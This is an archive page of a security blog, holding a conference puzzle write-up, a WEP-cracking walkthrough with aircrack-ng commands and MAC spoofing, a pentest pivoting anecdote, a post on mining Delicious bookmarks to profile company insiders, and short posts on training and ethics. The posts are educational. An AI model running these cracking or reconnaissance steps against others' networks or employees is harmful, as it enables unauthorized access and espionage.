Tag Archives: hacking

Solving the THOTCON 0×2 Pre-Sale Puzzle

Posted by Jon Janego on November 2, 2010 1 comment

Earlier this year, some folks in the Chicago security community got together and organized a conference called THOTCON, which turned out to be a resounding success.  It took place in April and drew several hundred people together for a day filled with some great talks, beer, and general hacking socialness.

To gather some early buzz (as well as to have some fun) for the follow-up next spring, the organizers decided to do an early pre-sale puzzle.  Of course, like many things in the security community, the hints were leaked only to their twitter stream.  Inspired by a few of my friends poking at it, and with some free time to spare, in the spirit of learning (and a chance to save about $20!) I decided to take a stab at the puzzle.

By the time I started working on it, the organizers had leaked a few hints.  Here’s where it was at when I began:

Puzzle -> FAW2GlImKsT3BL8yKQF= zf-c75-sb-j 60max #thotcon0x2

Hint #7 – I am the answer to my own puzzle. You just need to look at me the right way
Hint #6 – Decrypt, then decode
Hint #5 – The coolest thing about part 2 is… You dont have to do ANYTHING. (Put it somewhere and tada!)
Hint #4 – Part 2: I’m not a cipher, I’m a conversion. You have the tool to convert me. In fact, you don’t have to convert me.
Hint #3 – Part 1: He is dead
Hint #2 – What do you mean I was part of the Reichstag zu Worms?
Hint #1 – I was born on April 5th. #thotcon0x2 <— puzzle hint?

So, to break it down, the hints indicated a 3 step process to solve the initial hint string.

Step 0:

Working from the string:

FAW2GlImKsT3BL8yKQF= zf-c75-sb-j 60max #thotcon0x2

To be honest, I wouldn’t have had much to go from here were it not for the hints, and my twitter addiction.  I picked out the ‘zf’, ‘c75′, ‘sb’, and ‘j’ as being the handles of several of the organizers – @zfasel, @c7five, @sak3bomb, and @jaku.  So we could drop that.  ’60max’- this is cleartext and probably not a code, so dropped.  ‘#thotcon0x2′ – again, twitterese – a hashtag used to talk about the conference.  Dropped.

So we’re left with the cipherext to decode,

FAW2GlImKsT3BL8yKQF=

I suppose that’s a start.

Step 1:

I’m not much of a cryptologist, but I do know a bit of the history, mostly thanks to reading Simon Singh’s excellent The Code Book.  I figured it was a reasonable assumption that this is a classical cipher, breakable by hand.  So, poking a bit around Wikipedia for famous classical ciphers, a bit of digging came up with April 5th being a reference to Blaise de Vigenère, whose name is attached to the famous Vigenere Cipher.

This cipher is a relatively straightforward method of letter substitution, which a dedicated person could do by hand.  However, being a citizen of the 21st century, I wanted to put computers to work for me – so I found a site to decode it!

http://sharkysoft.com/misc/vigenere/

Problem was… a Vigenere cipher requires you to use a known key to decode it.  Which I didn’t have, so I began guessing.

This required jumping ahead a little bit – what to do with the decoded ciphertext?  The hint to part 2 indicated that it was a conversion… so my natural first guess was Base64, just because it’s so common.  So I began working on the assumption that my decoded ciphertext would be Base64 encoded.  I found an online decoder and began guessing away.

Now, a Vigenere cipher would be relatively easy to bruteforce in the age of modern computing, but I didn’t honestly expect the organizers to force people to write a brute forcer.  Instead, I began guessing words associated with the security community.  Eventually, after guessing many words… I tried the name of the conference itself – THOTCON0x2.  And bingo!  I had cleartext that also decoded to Base64:

MTI2NjUzNzM3NS8wWDI=

Step 2:

I suppose this is a bit redundant since I had been testing my cleartext in the Base64 decoder the entire time.  Using this online decoder:

http://www.motobit.com/util/base64-decoder-encoder.asp

I ended up with some very promising text:

1266537375/0X2

Step 3:

In the spirit of full disclosure here, step 3 was where I performed a bit of ‘social surveillance’.  Following the #thotcon hashtag on twitter and saw Nick, one of the organizers, post a hint saying something to the extent of, “is it alive?”

How do you check if a computer is alive?  Usually a good first step is to ping it.  I already had my suspicions about this string, but this gave me the idea to just run a ping at the decimals in that address (the ’0X2′ was clearly intentional and I dropped it from consideration).

ping 1266537375

Pinging 75.125.211.159 with 32 bytes of data:
...

Ping did the translation for me, nice!  Now I have a more easily readable IP address.

This string was a decimal representation of an IP address.  Not commonly used, but still valid – and if it’s used commonly anywhere, it’s with spammers/phishers who like to obscure their targets from cursory glances.  You can read more about it here.

Step 4:

So now we had an IP address.  Now what?  A nmap scan showed a webserver running on port 80, so I sent my browser there…. and got a blank page.

But wait a minute…. wasn’t there a string I dropped from that address?  ‘/0X2′.  After kicking myself for the brain fart, I navigated to…

http://75.125.211.159/0X2/

And had what looked like a winner!

There were three images there – unfortunately not loading at the time – and a link to the registration page.  When doing a mouseover the three images, some codes were revealed:

VEHPVE
NPTJB4M
I0YMDEX

I moved on over to the registration page, concatenated these strings together… and success!  The discount code was accepted.

Conclusion

This puzzle was a fun one, which pushed you to think a bit outside the box.  Also, because it was released ‘into the wild’, the internet was at your full disposal to track down hints.  So while it may have been shortcutting a bit, I didn’t see anything wrong with spying on @c7five as he gave hints to other players ;-)

I don’t know how many pre-sale tickets that they ended up selling, but the initial hint was that they only were offering 60 of them at the discounted price.  So, having solved it before they publicly revealed the pre-sales code, I felt pretty proud of myself.  Perhaps I was just lucky to have the free time to poke at it.  I’ve also gotta thank my friends for pointing me in the right direction after I got stuck (and way to go, Rudy, Jeff and Jim for being more clever than I and figuring it out faster!).

The puzzle appears to have been primarily created by Sak3bomb, who is clearly a brilliant individual, much more clever than those of us trying to work backwards.  Major props to him and his collaborators for putting together a fun puzzle.   He archived the hints on his webpage here:

http://www.haxbysakebomb.com/thotcon.html

I’m really looking forward to the next THOTCON, and general sale tickets are available now – so go on and buy em.  I’ll see you there!

WEP Cracking 101

Posted by Jon Janego on September 23, 2010 No comments

It’s occured to me, many folks understand that WEP is easy to break, but don’t know all the steps and just how easy it is.  Here I hope to lay down the basic steps in one coherent post.. demonstrating how to crack into a wireless network using WEP, with a client attached to it.

Like always… only do this against your own networks.  The legal grounds are a bit grey here, but the ethical grounds are clear – you shouldn’t pick your neighbor’s doorlock.  Being a security professional also comes with the responsibility to use your skills for good, not evil.

Step 0: get the software.

I assume you’re using linux…. these tools do work on OSX but they require a bit of tweaking i think, and i haven’t done it myself.  so i’ll just write up linux.  you can use a VM of linux but the wireless card support is a bit flakier unless you’re using a USB card.

basically you only will need two packages, kismet, and aircrack-ng

So:
apt-get install kismet
apt-get install aircrack-ng

Step 1: Find a WEP network

Kismet is an amazingly powerful scanning tool and I could write much more about it than we need here.  It takes advantage of the feature in wireless cards to use “monitor mode”, which basically does passive listening for network traffic, and analyzes the traffic into a nice list.  It can do all sorts of other neat stuff like gps logging, etc, but that’s not totally necessary here.

If you don’t know it, you’ll need the interface name for your wireless card.  Check it by typing:

iwconfig
Then, just launch kismet (type ‘kismet‘) and then it will prompt you what your WLAN card is.  It will try and put it into monitor mode and is usually successful, even with built-in wireless.  If not theres some troubleshooting to be done….

Assuming it works, it will give you a list of networks it sees.  It ‘hops’ channels by switching the frequency the card is listening on and collects traffic on that frequency.  If there’s a WEP network in sight, kismet will highlight it in red, and you will need to pay attention to four things:

  • Its BSSID – similar to the MAC address of the access point
  • The ESSID – the ‘friendly name’ of the network
  • The MAC address of a client that is attached to it.
  • The channel the AP is broadcasting on

Kismet has a column that shows the amount of traffic it sees for both the AP in general and the client.  You want to target one with a client attached that is passing data… they’re the easiest targets.

An alternate path to WLAN monitor mode:

If kismet has a hard time putting your card into monitor mode, try running ‘airomon-ng start <interfacename>’ and it should attempt to do so.  If that still doesn’t work…. investigate getting a new card.  The Alfa AWUS306Hf is an excellent USB choice.

Step 2: prepare to attack

If it’s not setup yet, enable monitor mode:

airomon-ng start <interfacename>.

Begin a dump session – this logs traffic, sort of like a lightweight Wireshark.  You want to filter it to only the transactions we’re interested in:

airodump-ng –channel <c> –bssid <xx:xx:xx:xx:xx> –write <fileprefixname> <interfacename>

where c: the broadcast channel of the network
xx: BSSID of the network
<interfacename> – self explanatory (i.e. wlan0mon)

Keep this running and launch a new window for the next steps.

Step 3: do an ARP replay attack

This essentially looks for an ARP request from the attached client, and replays it many many times, enough to create a data set large enough to mount a cryptographic attack against WEP.

aireplay-ng –arpreplay -h <xx:xx:xx:xx:xx:xx> -b <yy:yy:yy:yy:yy:yy:> <interfacename>

where xx: the MAC address of the client
yy: BSSID of the network
<interfacename> – self explanatory (i.e. wlan0mon)

Once this has started, check out the other window.  You should see the data packets starting to increase rapidly.  When you’re at about 40k there is enough to crack a 104-bit WEP key.  The more the better, but no harm in starting early…

Step 4: mount the cryptographic attack

From the same directory you launched the dump process just run this:

aicrcrack-ng <fileprefixname>.cap -0

This will launch a window that shows progress.  if it’s successful, you’ll see the key!  if it’s not… keep waiting for more traffic.  40k+ data packets increases your odds tremendously but if it’s a simple WEP key it requires less.  This tool will actually keep trying as the packet capture increases in size so you can keep it running.  Or quit it (ctrl-c) and wait till you have more.

Step 5: connect!

If all went well you have broken the WEP key via the PTW attack method.  Now you can connect to the network.  Close down the dump sessions, etc etc and bring down your WLAN card – ifconfig wlan0 down

Then you’ve just gotta connect:
ifconfig <interface> up - bring up the wlan card

iwconfig <interface>mode managed key [WEP key]

iwconfig <interface> essid “[ESSID]” (Specify ESSID for the WLAN)

dhclient [interface] (to receive an IP address, netmask, DNS server and default gateway from the Access Point)

If all goes well you’ll get an IP and then you’re good to go, test by pinging or whatever else.

But if it didn’t work, they may have MAC filtering in place…

So change the MAC address of your wireless card to the same one that you just cracked with!  This is a bit messy and could freak out the DHCP server of the access point, but it’s worth a shot.

Bring the card down first:

ifconfig wlan0 down

Then change the MAC:

ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx

Bring it back up again and repeat.  You should be good to go.

This is a simplified walkthrough of a process that is documented many other places.  It should give you a taste of kismet, and the basics of the aircrack-ng suite, which has many many other great features.  I encourage you to read all about it over on their website.

Additionally, their site also contains a much more in-depth WEP crack tutorial.

Again, this is not ground-breaking, but it is always good to share the fundamentals in case someone hasn’t seen it before.  Good luck!

Pivot Mercilessly!

Posted by Jon Janego on March 17, 2010 No comments

I just returned from a great trip to SANS 2010, in Orlando, where I was taking SEC 560 – Penetration Testing.  Our instructor, Ed Skoudis (an amazing guy, by the way), repeatedly hammered into our brains the mantra “Pivot Mercilessly!”

This concept is something that a penetration tester or vulnerability assessor needs to always keep in mind – look for the easy toehold into a system, and then see where you can go from there.  “Pivot” throughout the environment using the weak link as a starting point.

I was performing an assessment recently on a Solaris system that demonstrated this concept very effectively.  One of the boxes was vulnerable to a relatively old telnet vulnerability , which we exploited with pleasure – granting us root access to the machine.  From there, we examined the trust relationships inside the network and noticed that this box had “r service” trust relationships set up with many other machines in the network.  So, we used rsh to connect to numerous other boxes, all with root level access, and from those boxes to others… quickly we had the entire system PWNED.

All of this was made possible by a single box with one weak spot.  This is likely the case with most systems out there – maybe you’ll have one or two boxes vulnerable to exploits, especially in a well-managed corporate network.  From there, it’s up to you to pivot your way through the rest of the system!

Information Leakage via Delicious

Posted by Jon Janego on July 10, 2009 3 comments

By now, the concept of “google hacking” is pretty commonly understood.  People may not be preventing it very well, but it’s moved beyond a new thing.

For the uninitiated, though, here’s a brief summary: using Google (or any other search engine – but really, is there any other?) to find vulnerable web apps, personal information, mp3s in public directories, etc etc.  It’s great fun, and a pretty fundamental initial step of profiling an attack target.

Johnny Long was one of the main evangelists of this method and has a great database of search terms.  It’s no longer actively maintained, but you can still find plenty of good information with this as a starting point!

So Google hacking is great, but it only gets you to the public internet.  What if I wanted to profile the inside of a company, from the outside?  And passively – without hitting their servers myself?  Wouldn’t it be great if I could look for public information shared by company insiders?

Delicious seems almost perfectly designed to do this kind of activity.  For the unfamiliar, delicious is an online bookmarking site, designed around the idea that sharing bookmarks is a great way to learn about new sites.  Which is an alright idea…  but don’t people also bookmark a lot of private information?  I sure do!

Making matters worse, delicious encourages users to get started by uploading their browser bookmarks.  Essentially uploading gobs of potentially personal data to a public site.  This is a classic case of information leakage.  A dedicated attacker can use this public information to get all sorts of juicy tidbits about a company.

Let’s do some examples.  This all works great in theory, but, like Google, there is a LOT of data to sort through.  Say I’m a bad guy interested in insider information about a company.  I can start looking for the basics – say… “intranet”.  Delicious makes this easier by encouraging users to tag their posts for easy categorization:

http://delicious.com/tag/intranet

So that gives me everything that users have tagged with ‘intranet’.   Lots of sites about intranet design, usability, etc.  But also sites tagged by users to manage their own bookmarks!  So I’ll start digging into an individual company… how about AMD?

http://delicious.com/search?p=amd&u=&chk=&context=recent&tag=intranet

intranet_amd

The first result doesn’t look interesting, but the second and third, well those sound like intranet sites!  This is confirmed by trying to follow them through and the DNS not resolving.  Nice!  Now let’s see what else this presumed AMD employee has bookmarked…

links_1

Wow, lots of development related links!  Interesting.  And what’s that link on page 2 about “AMD Manager Toolkit” ??  This fellow looks like he’s a technical manager at AMD!

Dig a little deeper, and it looks like we have another intranet site – mentioning the (presumably internal) code name of a project.  Interesting!  Go further into the links, and you see even further links to internal project Wiki pages.

links_2

Surfing around to a few of the non-intranet sites gives me an even better profile of this person.  They work with unit testing.  They use UML, C++, and Ruby, and read a lot about circuit design.  They live in India.  They’re learning guitar, and are interested in martial arts.

This may seem like innocent information to an outsider, but if I was doing this for espionage purposes, I just learned a lot about the internal operations of a project – and this is with 10 minutes of work on one webpage.  What else could I find if I dug through the internet further?

Web 2.0 is a lot of fun, and can be really useful.  But what’s often overlooked are the implications of sharing all this information.  Unless you make it a point to protect your privacy, that privacy probably doesn’t exist.  And for businesses, this can be a major potential risk.

Delicious certainly doesn’t help stop this – according to the FAQ, you cannot make your links private by default, but instead must manually edit them to make them private.  And also, the TOS leaves responsibility entirely in the hands of the users.  Very laissez-faire!

Should companies ban employees from using sites like delicious?  Probably not.  But I think that this demonstrates that employees need to be more educated on what they are exposing themselves and their employer to when using social networking sites.

Where Have We Been?

Posted by Jon Janego on April 15, 2009 1 comment

Wow, it’s been over a month without much action here at Securism.  But it’s not for lack of stuff to talk about – precisely the opposite, we’ve all been so incredibly busy that this little blog has fallen by the wayside.  But I promise that we’ll get right back up at it!  In the meantime, here’s what we’ve all been doing.

Ben and I both attended the SANS 2009 conference in early March, in Orlando.  He was in the advanced penetration testing class, and I was taking the wireless security class.  Verdict on both of those: AWESOME.

Walter also went to a SANS conference in Phoenix to attend a class on secure network design.

I also just finished the EC-Council Certified Ethical Hacker program, which is a good overview certification class.  Don’t underestimate that exam – it’s a tricky one!

Beyond the gobs of training, we’ve also been working on some great stuff at work, getting well up to our necks in the world of PCI.

So, dear readers, don’t fret.  We’re still here, and will be back shortly!

With Great Power, Comes Great Responsibility

Posted by Jon Janego on January 19, 2009 No comments

Last week’s SANS newsletter caught my eye for an interesting story mentioned in it – “Wireless Hacking Braggarts Avoid Jail Time”.  It links to a story in the Cleveland Plain Dealer about two security consultants who were caught in a FBI sting for wirelessly stealing data from a fake defense contractor.

These two fellows were approached with a great offer – $100,000(!) – to grab some files wirelessly and discreetly.  The FBI got the idea of approaching them after they mentioned in an article in Crain’s Cleveland Business that they had broken into several networks wirelessly, and that companies should hire them to protect their networks.  Whoops!

This brings up a tricky question about infosec in general – in a business environment that is only slowly becoming aware to the issue of security, how does one generate new business?  It can seem tempting to ‘demonstrate’ the cost of bad security to a client – and cold-calling a business with information about their vulnerabilities is a sure way to wreck that relationship.  The responsibilities of a security professional are to clearly communicate the importance of a strong security posture and to let that information speak for itself.

These two guys took the exactly wrong approach to selling computer security – becoming the ‘bad guys’ that they’re supposed to be protecting clients against!  In the security field, more than many others, the line between ‘good guy’ and ‘bad guy’ can be blurry.  An infosec professional who is only using commercial tools isn’t really getting in the head of a ‘bad guy’ – because the bad guys are using open source tools, not the expensive Foundstone package.  We’ve got to get in the minds of the threats in order to defend against the them.

This is where professional programs like CEH have value.  This program teaches security professionals both the tools of the ‘bad guys’, and the ethics required to use them properly.  The temptation of a quick payday may be lurking for some people, but it’s good to see that the FBI and other government organizations are actively watching out for these type of people.

As Spiderman said – “With great power, comes great responsibility”.  Security professionals need to keep this at the forefront of their mind at all times.  We’d probably be better off by not wearing tights and a mask, though!